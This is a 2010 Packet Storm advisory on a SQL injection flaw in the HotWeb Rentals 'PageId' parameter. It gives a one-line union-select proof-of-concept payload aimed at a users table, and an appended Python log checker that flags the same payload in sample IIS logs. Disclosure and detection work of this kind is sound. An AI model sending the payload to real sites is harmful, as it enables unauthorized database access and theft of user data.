HotWeb Rental SQL Injection

2010-12-29T00:00:00
ID PACKETSTORM:97150
Type packetstorm
Reporter non-customers
Modified 2010-12-29T00:00:00

Description

                                        
HotWeb Rentals "PageId" SQL Injection Vulnerability

PRODUCT >>> http://www.hotwebscripts.co.uk/

Input passed to the "PageId" parameter in default.asp is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC >>> default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users

--
non-customers crew | http://rock-madrid.com/
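
Added example, not part of the original advisory and not the vendor's code: a log check that flags requests to default.asp whose "PageId" value is not a plain integer, which is the shape the POC above has once URL-decoded. The IIS W3C log excerpt, the IP addresses, the function name suspicious_page_ids and the rule that legitimate PageId values are non-negative integers are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs

# Assumption: legitimate PageId values are plain non-negative integers.
VALID_PAGE_ID = re.compile(r"[0-9]{1,10}")

# Constructed IIS W3C log excerpt (documentation IP addresses, not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2010-12-29 10:00:01 GET /default.asp PageId=15 192.0.2.10 200
2010-12-29 10:00:07 GET /default.asp PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users 192.0.2.77 200
2010-12-29 10:00:09 GET /Default.asp pageid=12abc 192.0.2.77 500
2010-12-29 10:00:12 GET /images/logo.gif - 192.0.2.10 200
"""


def suspicious_page_ids(log_text, page="/default.asp", param="pageid"):
    """Return (client_ip, decoded_value) for each request to `page` whose
    `param` value is not a plain integer."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS and Classic ASP match the path and parameter names case-insensitively.
        if row.get("cs-uri-stem", "").lower() != page:
            continue
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        for name, values in query.items():
            if name.lower() != param:
                continue
            for value in values:  # parse_qs has already URL-decoded these
                if not VALID_PAGE_ID.fullmatch(value):
                    hits.append((row.get("c-ip", "?"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_page_ids(SAMPLE_LOG):
        print(f"{ip}  PageId={value!r}")
```

The same allowlist (digits only, then a parameterised query) is the server-side fix for the unsanitised parameter; the log check only tells you whether the weakness has been probed.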